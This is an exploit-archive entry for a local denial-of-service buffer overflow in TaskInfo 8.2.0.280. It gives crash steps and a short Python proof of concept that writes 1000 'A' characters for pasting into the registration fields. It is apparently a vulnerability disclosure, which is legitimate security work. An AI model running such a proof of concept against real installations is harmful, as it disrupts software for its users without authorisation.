TaskInfo 8.2.0.280 Denial Of Service

TaskInfo version 8.2.0.280 suffers from a denial of service vulnerability.


MD5 | 7899aecb5817c7b6e2c04832954abe40

# Exploit Title: TaskInfo v8.2.0.280 - Denial of Service (PoC)
# Discovery by: Rafael Pedrero
# Discovery Date: 2019-01-30
# Vendor Homepage: http://www.iarsn.com/
# Software Link : http://www.iarsn.com/
# Tested Version: v8.2.0.280
# Tested on: Windows XP SP3
# Vulnerability Type: Denial of Service (DoS) Local Buffer Overflow

# Steps to Produce the Crash:
# 1.- Run TaskInfo.exe
# 2.- copy content TaskInfo_Crash.txt to clipboard (result from this python script)
# 3.- Go to "Help" - "Registration" - "Set or View Registration Information" and paste the result in the "New User Name:" and "New Serial Number:" textbox.
# 4.- Click in OK button and you will see a crash.


#!/usr/bin/env python


crash = "\x41" * 1000
f = open ("TaskInfo_Crash.txt", "w")
f.write(crash)
f.close()

Related Posts